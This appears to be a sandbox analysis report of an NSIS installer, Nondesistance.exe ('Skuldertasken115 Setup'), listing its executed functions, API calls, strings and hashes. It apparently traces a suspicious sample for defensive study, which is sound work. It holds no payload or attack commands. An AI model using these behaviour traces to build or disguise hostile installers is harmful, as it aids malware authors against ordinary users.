5271->5272 5274 401edd 5272->5274 5275 405c8d wsprintfA 5272->5275 5275->5274 5276 40193f 5277 402a3a 18 API calls 5276->5277 5278 401946 lstrlenA 5277->5278 5279 402513 5278->5279

                                                                                                  Executed Functions

                                                                                                  Function 0040310F Relevance: 93.1, APIs: 33, Strings: 20, Instructions: 357stringcomfileCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 40310f-403144 SetErrorMode GetVersion 1 403146-40314e call 4060c8 0->1 2 403157 0->2 1->2 7 403150 1->7 4 40315c-40316f call 40605a lstrlenA 2->4 9 403171-4031e4 call 4060c8 * 2 #17 OleInitialize SHGetFileInfoA call 405d2f GetCommandLineA call 405d2f GetModuleHandleA 4->9 7->2 18 4031f0-403205 call 4057cc CharNextA 9->18 19 4031e6-4031eb 9->19 22 4032ca-4032ce 18->22 19->18 23 4032d4 22->23 24 40320a-40320d 22->24 25 4032e7-403301 GetTempPathA call 4030de 23->25 26 403215-40321d 24->26 27 40320f-403213 24->27 36 403303-403321 GetWindowsDirectoryA lstrcatA call 4030de 25->36 37 403359-403373 DeleteFileA call 402c66 25->37 29 403225-403228 26->29 30 40321f-403220 26->30 27->26 27->27 31 4032ba-4032c7 call 4057cc 29->31 32 40322e-403232 29->32 30->29 31->22 51 4032c9 31->51 34 403234-40323a 32->34 35 40324a-403277 32->35 39 403240 34->39 40 40323c-40323e 34->40 41 403279-40327f 35->41 42 40328a-4032b8 35->42 36->37 53 403323-403353 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4030de 36->53 54 403407-403417 call 4035d5 OleUninitialize 37->54 55 403379-40337f 37->55 39->35 40->35 40->39 46 403281-403283 41->46 47 403285 41->47 42->31 49 4032d6-4032e2 call 405d2f 42->49 46->42 46->47 47->42 49->25 51->22 53->37 53->54 66 40353b-403541 54->66 67 40341d-40342d call 405525 ExitProcess 54->67 58 403381-40338c call 4057cc 55->58 59 4033f7-4033fe call 4036af 55->59 68 4033c2-4033cc 58->68 69 40338e-4033b7 58->69 64 403403 59->64 64->54 71 403543-40355c GetCurrentProcess OpenProcessToken 66->71 72 4035bd-4035c5 66->72 76 403433-403447 call 4054a8 lstrcatA 68->76 77 4033ce-4033db call 40588f 68->77 73 4033b9-4033bb 69->73 79 40358e-40359c call 4060c8 71->79 80 40355e-403588 LookupPrivilegeValueA AdjustTokenPrivileges 71->80 74 4035c7 72->74 75 4035cb-4035cf ExitProcess 72->75 73->68 81 4033bd-4033c0 73->81 74->75 89 403454-40346e lstrcatA lstrcmpiA 76->89 90 403449-40344f lstrcatA 76->90 77->54 88 4033dd-4033f3 call 405d2f * 2 77->88 91 4035aa-4035b4 ExitWindowsEx 79->91 92 40359e-4035a8 79->92 80->79 81->68 81->73 88->59 89->54 95 403470-403473 89->95 90->89 91->72 93 4035b6-4035b8 call 40140b 91->93 92->91 92->93 93->72 99 403475-40347a call 40540e 95->99 100 40347c call 40548b 95->100 104 403481-40348e SetCurrentDirectoryA 99->104 100->104 107 403490-403496 call 405d2f 104->107 108 40349b-4034c3 call 405d2f 104->108 107->108 112 4034c9-4034e5 call 405d51 DeleteFileA 108->112 115 403526-40352d 112->115 116 4034e7-4034f7 CopyFileA 112->116 115->112 117 40352f-403536 call 405bea 115->117 116->115 118 4034f9-403519 call 405bea call 405d51 call 4054c0 116->118 117->54 118->115 127 40351b-403522 CloseHandle 118->127 127->115
                                                                                                  APIs
                                                                                                  • SetErrorMode.KERNELBASE ref: 00403134
                                                                                                  • GetVersion.KERNEL32 ref: 0040313A
                                                                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403163
                                                                                                  • #17.COMCTL32(00000007,00000009), ref: 00403185
                                                                                                  • OleInitialize.OLE32(00000000), ref: 0040318C
                                                                                                  • SHGetFileInfoA.SHELL32(00428828,00000000,?,00000160,00000000), ref: 004031A8
                                                                                                  • GetCommandLineA.KERNEL32(Skuldertasken115 Setup,NSIS Error), ref: 004031BD
                                                                                                  • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Nondesistance.exe",00000000), ref: 004031D0
                                                                                                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Nondesistance.exe",00000020), ref: 004031FB
                                                                                                  • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032F8
                                                                                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403309
                                                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403315
                                                                                                  • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403329
                                                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403331
                                                                                                  • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403342
                                                                                                  • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040334A
                                                                                                  • DeleteFileA.KERNELBASE(1033), ref: 0040335E
                                                                                                    • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                                                    • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                                                  • OleUninitialize.OLE32(?), ref: 0040340C
                                                                                                  • ExitProcess.KERNEL32 ref: 0040342D
                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 0040354A
                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403551
                                                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403569
                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403588
                                                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 004035AC
                                                                                                  • ExitProcess.KERNEL32 ref: 004035CF
                                                                                                    • Part of subcall function 00405525: MessageBoxIndirectA.USER32(00409218), ref: 00405580
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                                                                  • String ID: "$"C:\Users\user\Desktop\Nondesistance.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Nondesistance.exe$C:\Users\user\dewater\reinsmen$C:\Users\user\dewater\reinsmen$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$Skuldertasken115 Setup$TEMP$TMP$UXTHEME$\Temp$`K3w$~nsu
                                                                                                  • API String ID: 3329125770-1477354821
                                                                                                  • Opcode ID: 2a4e45490e6ca04841cd56f5ac96f25520fff28ec32ec90da2ff32a4d7a4cf5b
                                                                                                  • Instruction ID: 749ed98c63e487a66f460374afa67f5348490bcf6ac540fe4d7c6930d14d49f5
                                                                                                  • Opcode Fuzzy Hash: 2a4e45490e6ca04841cd56f5ac96f25520fff28ec32ec90da2ff32a4d7a4cf5b
                                                                                                  • Instruction Fuzzy Hash: E1C105306086416AE7216F61AC4DA6F3EACEF46706F04457FF541BA1E3C77C9A058B2E
                                                                                                  Function 00405086 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 128 405086-4050a2 129 405231-405237 128->129 130 4050a8-40516f GetDlgItem * 3 call 403f49 call 4047e6 GetClientRect GetSystemMetrics SendMessageA * 2 128->130 132 405261-40526d 129->132 133 405239-40525b GetDlgItem CreateThread CloseHandle 129->133 150 405171-40518b SendMessageA * 2 130->150 151 40518d-405190 130->151 135 40528f-405295 132->135 136 40526f-405275 132->136 133->132 140 405297-40529d 135->140 141 4052ea-4052ed 135->141 138 4052b0-4052b7 call 403f7b 136->138 139 405277-40528a ShowWindow * 2 call 403f49 136->139 154 4052bc-4052c0 138->154 139->135 145 4052c3-4052d3 ShowWindow 140->145 146 40529f-4052ab call 403eed 140->146 141->138 143 4052ef-4052f5 141->143 143->138 152 4052f7-40530a SendMessageA 143->152 148 4052e3-4052e5 call 403eed 145->148 149 4052d5-4052de call 404f48 145->149 146->138 148->141 149->148 150->151 157 4051a0-4051b7 call 403f14 151->157 158 405192-40519e SendMessageA 151->158 159 405310-40533c CreatePopupMenu call 405d51 AppendMenuA 152->159 160 405407-405409 152->160 167 4051b9-4051cd ShowWindow 157->167 168 4051ed-40520e GetDlgItem SendMessageA 157->168 158->157 165 405351-405367 TrackPopupMenu 159->165 166 40533e-40534e GetWindowRect 159->166 160->154 165->160 170 40536d-405387 165->170 166->165 171 4051dc 167->171 172 4051cf-4051da ShowWindow 167->172 168->160 169 405214-40522c SendMessageA * 2 168->169 169->160 173 40538c-4053a7 SendMessageA 170->173 174 4051e2-4051e8 call 403f49 171->174 172->174 173->173 176 4053a9-4053c9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 173->176 174->168 177 4053cb-4053eb SendMessageA 176->177 177->177 178 4053ed-405401 GlobalUnlock SetClipboardData CloseClipboard 177->178 178->160
                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32(?,00000403), ref: 004050E5
                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004050F4
                                                                                                  • GetClientRect.USER32(?,?), ref: 00405131
                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 00405138
                                                                                                  • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405159
                                                                                                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040516A
                                                                                                  • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040517D
                                                                                                  • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040518B
                                                                                                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040519E
                                                                                                  • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004051C0
                                                                                                  • ShowWindow.USER32(?,00000008), ref: 004051D4
                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004051F5
                                                                                                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405205
                                                                                                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040521E
                                                                                                  • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040522A
                                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 00405103
                                                                                                    • Part of subcall function 00403F49: SendMessageA.USER32(00000028,?,?,00403D7A), ref: 00403F57
                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405246
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000501A,00000000), ref: 00405254
                                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 0040525B
                                                                                                  • ShowWindow.USER32(00000000), ref: 0040527E
                                                                                                  • ShowWindow.USER32(?,00000008), ref: 00405285
                                                                                                  • ShowWindow.USER32(00000008), ref: 004052CB
                                                                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FF
                                                                                                  • CreatePopupMenu.USER32 ref: 00405310
                                                                                                  • AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 00405325
                                                                                                  • GetWindowRect.USER32(?,000000FF), ref: 00405345
                                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040535E
                                                                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040539A
                                                                                                  • OpenClipboard.USER32(00000000), ref: 004053AA
                                                                                                  • EmptyClipboard.USER32 ref: 004053B0
                                                                                                  • GlobalAlloc.KERNEL32(00000042,?), ref: 004053B9
                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004053C3
                                                                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053D7
                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004053F0
                                                                                                  • SetClipboardData.USER32(?,00000000), ref: 004053FB
                                                                                                  • CloseClipboard.USER32 ref: 00405401
                                                                                                  Strings
                                                                                                  • Skuldertasken115 Setup: Installing, xrefs: 00405376
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                  • String ID: Skuldertasken115 Setup: Installing
                                                                                                  • API String ID: 590372296-1232910203
                                                                                                  • Opcode ID: 55b9db7a2fcc10364cc793a09e221b9681578bfcfc0c0d8e32da0e63cc10e039
                                                                                                  • Instruction ID: b5f1ce2ce4d05df4ba5ebffd303825d409c0ca4f752acec20acacd4dcda6ac6e
                                                                                                  • Opcode Fuzzy Hash: 55b9db7a2fcc10364cc793a09e221b9681578bfcfc0c0d8e32da0e63cc10e039
                                                                                                  • Instruction Fuzzy Hash: C9A14871900208BFEB119FA0DD89AAE7F79FB08354F10407AFA01BA1A0C7755E51DF69
                                                                                                  Function 00403A41 Relevance: 59.8, APIs: 32, Strings: 2, Instructions: 345windowstringCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 179 403a41-403a53 180 403b94-403ba3 179->180 181 403a59-403a5f 179->181 183 403bf2-403c07 180->183 184 403ba5-403bed GetDlgItem * 2 call 403f14 SetClassLongA call 40140b 180->184 181->180 182 403a65-403a6e 181->182 185 403a70-403a7d SetWindowPos 182->185 186 403a83-403a86 182->186 188 403c47-403c4c call 403f60 183->188 189 403c09-403c0c 183->189 184->183 185->186 191 403aa0-403aa6 186->191 192 403a88-403a9a ShowWindow 186->192 197 403c51-403c6c 188->197 194 403c0e-403c19 call 401389 189->194 195 403c3f-403c41 189->195 198 403ac2-403ac5 191->198 199 403aa8-403abd DestroyWindow 191->199 192->191 194->195 210 403c1b-403c3a SendMessageA 194->210 195->188 196 403ee1 195->196 204 403ee3-403eea 196->204 202 403c75-403c7b 197->202 203 403c6e-403c70 call 40140b 197->203 207 403ac7-403ad3 SetWindowLongA 198->207 208 403ad8-403ade 198->208 205 403ebe-403ec4 199->205 213 403c81-403c8c 202->213 214 403e9f-403eb8 DestroyWindow EndDialog 202->214 203->202 205->196 211 403ec6-403ecc 205->211 207->204 215 403b81-403b8f call 403f7b 208->215 216 403ae4-403af5 GetDlgItem 208->216 210->204 211->196 218 403ece-403ed7 ShowWindow 211->218 213->214 219 403c92-403cdf call 405d51 call 403f14 * 3 GetDlgItem 213->219 214->205 215->204 220 403b14-403b17 216->220 221 403af7-403b0e SendMessageA IsWindowEnabled 216->221 218->196 249 403ce1-403ce6 219->249 250 403ce9-403d25 ShowWindow KiUserCallbackDispatcher call 403f36 EnableWindow 219->250 222 403b19-403b1a 220->222 223 403b1c-403b1f 220->223 221->196 221->220 226 403b4a-403b4f call 403eed 222->226 227 403b21-403b27 223->227 228 403b2d-403b32 223->228 226->215 230 403b68-403b7b SendMessageA 227->230 231 403b29-403b2b 227->231 228->230 232 403b34-403b3a 228->232 230->215 231->226 235 403b51-403b5a call 40140b 232->235 236 403b3c-403b42 call 40140b 232->236 235->215 245 403b5c-403b66 235->245 247 403b48 236->247 245->247 247->226 249->250 253 403d27-403d28 250->253 254 403d2a 250->254 255 403d2c-403d5a GetSystemMenu EnableMenuItem SendMessageA 253->255 254->255 256 403d5c-403d6d SendMessageA 255->256 257 403d6f 255->257 258 403d75-403dae call 403f49 call 405d2f lstrlenA call 405d51 SetWindowTextA call 401389 256->258 257->258 258->197 267 403db4-403db6 258->267 267->197 268 403dbc-403dc0 267->268 269 403dc2-403dc8 268->269 270 403ddf-403df3 DestroyWindow 268->270 269->196 271 403dce-403dd4 269->271 270->205 272 403df9-403e26 CreateDialogParamA 270->272 271->197 273 403dda 271->273 272->205 274 403e2c-403e83 call 403f14 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 272->274 273->196 274->196 279 403e85-403e98 ShowWindow call 403f60 274->279 281 403e9d 279->281 281->205
                                                                                                  APIs
                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A7D
                                                                                                  • ShowWindow.USER32(?), ref: 00403A9A
                                                                                                  • DestroyWindow.USER32 ref: 00403AAE
                                                                                                  • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403ACA
                                                                                                  • GetDlgItem.USER32(?,?), ref: 00403AEB
                                                                                                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403AFF
                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403B06
                                                                                                  • GetDlgItem.USER32(?,?), ref: 00403BB4
                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403BBE
                                                                                                  • SetClassLongA.USER32(?,000000F2,?), ref: 00403BD8
                                                                                                  • SendMessageA.USER32(0000040F,00000000,?,?), ref: 00403C29
                                                                                                  • GetDlgItem.USER32(?,00000003), ref: 00403CCF
                                                                                                  • ShowWindow.USER32(00000000,?), ref: 00403CF0
                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403D02
                                                                                                  • EnableWindow.USER32(?,?), ref: 00403D1D
                                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403D33
                                                                                                  • EnableMenuItem.USER32(00000000), ref: 00403D3A
                                                                                                  • SendMessageA.USER32(?,000000F4,00000000,?), ref: 00403D52
                                                                                                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D65
                                                                                                  • lstrlenA.KERNEL32(Skuldertasken115 Setup: Installing,?,Skuldertasken115 Setup: Installing,Skuldertasken115 Setup), ref: 00403D8E
                                                                                                  • SetWindowTextA.USER32(?,Skuldertasken115 Setup: Installing), ref: 00403D9D
                                                                                                  • ShowWindow.USER32(?,0000000A), ref: 00403ED1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                  • String ID: Skuldertasken115 Setup$Skuldertasken115 Setup: Installing
                                                                                                  • API String ID: 3282139019-1074452773
                                                                                                  • Opcode ID: f98975a4e5554a2baf397d4590875313958baff0fae13c36641d055b5d6685e2
                                                                                                  • Instruction ID: 4996b7fab7fdeaebc033b1676f4cae353b3174fabf4a12f0715eb1af02f584c4
                                                                                                  • Opcode Fuzzy Hash: f98975a4e5554a2baf397d4590875313958baff0fae13c36641d055b5d6685e2
                                                                                                  • Instruction Fuzzy Hash: 74C1B131A04205ABDB216F62ED85E2B7EBCFB4570AF40053EF501B11E1C739A942DB6E
                                                                                                  Function 00405D51 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 199stringCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 423 405d51-405d5c 424 405d5e-405d6d 423->424 425 405d6f-405d84 423->425 424->425 426 405f77-405f7b 425->426 427 405d8a-405d95 425->427 428 405f81-405f8b 426->428 429 405da7-405db1 426->429 427->426 430 405d9b-405da2 427->430 431 405f96-405f97 428->431 432 405f8d-405f91 call 405d2f 428->432 429->428 433 405db7-405dbe 429->433 430->426 432->431 435 405dc4-405df9 433->435 436 405f6a 433->436 437 405f14-405f17 435->437 438 405dff-405e0a GetVersion 435->438 439 405f74-405f76 436->439 440 405f6c-405f72 436->440 443 405f47-405f4a 437->443 444 405f19-405f1c 437->444 441 405e24 438->441 442 405e0c-405e10 438->442 439->426 440->426 448 405e2b-405e32 441->448 442->441 445 405e12-405e16 442->445 449 405f58-405f68 lstrlenA 443->449 450 405f4c-405f53 call 405d51 443->450 446 405f2c-405f38 call 405d2f 444->446 447 405f1e-405f2a call 405c8d 444->447 445->441 451 405e18-405e1c 445->451 461 405f3d-405f43 446->461 447->461 453 405e34-405e36 448->453 454 405e37-405e39 448->454 449->426 450->449 451->441 457 405e1e-405e22 451->457 453->454 459 405e72-405e75 454->459 460 405e3b-405e5e call 405c16 454->460 457->448 464 405e85-405e88 459->464 465 405e77-405e83 GetSystemDirectoryA 459->465 472 405e64-405e6d call 405d51 460->472 473 405efb-405eff 460->473 461->449 463 405f45 461->463 470 405f0c-405f12 call 405f9a 463->470 467 405ef2-405ef4 464->467 468 405e8a-405e98 GetWindowsDirectoryA 464->468 466 405ef6-405ef9 465->466 466->470 466->473 467->466 471 405e9a-405ea4 467->471 468->467 470->449 476 405ea6-405ea9 471->476 477 405ebe-405ed4 SHGetSpecialFolderLocation 471->477 472->466 473->470 479 405f01-405f07 lstrcatA 473->479 476->477 480 405eab-405eb2 476->480 481 405ed6-405eed SHGetPathFromIDListA CoTaskMemFree 477->481 482 405eef 477->482 479->470 484 405eba-405ebc 480->484 481->466 481->482 482->467 484->466 484->477
                                                                                                  APIs
                                                                                                  • GetVersion.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00000000,00404F80,Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00000000), ref: 00405E02
                                                                                                  • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405E7D
                                                                                                  • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405E90
                                                                                                  • SHGetSpecialFolderLocation.SHELL32(?,0041B020), ref: 00405ECC
                                                                                                  • SHGetPathFromIDListA.SHELL32(0041B020,Call), ref: 00405EDA
                                                                                                  • CoTaskMemFree.OLE32(0041B020), ref: 00405EE5
                                                                                                  • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F07
                                                                                                  • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00000000,00404F80,Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00000000), ref: 00405F59
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                  • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                  • API String ID: 900638850-734733351
                                                                                                  • Opcode ID: 98f05c3dc1858b41120149467393982af1d97fd6e6ff5002d2d572682a9130ff
                                                                                                  • Instruction ID: d2d5afd6cadd1c558da9919d7f7a0e519c97b97f5b6dedc277a7ce0050389877
                                                                                                  • Opcode Fuzzy Hash: 98f05c3dc1858b41120149467393982af1d97fd6e6ff5002d2d572682a9130ff
                                                                                                  • Instruction Fuzzy Hash: 99610671A04916ABEF216B24DC85BBF7BA8DB15314F10813BE941BA2D1D33C4942DF9E
                                                                                                  Function 10001A5D Relevance: 20.0, APIs: 13, Instructions: 540stringmemoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                                                  • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 10001B67
                                                                                                  • lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
                                                                                                  • lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001BCC
                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001CCE
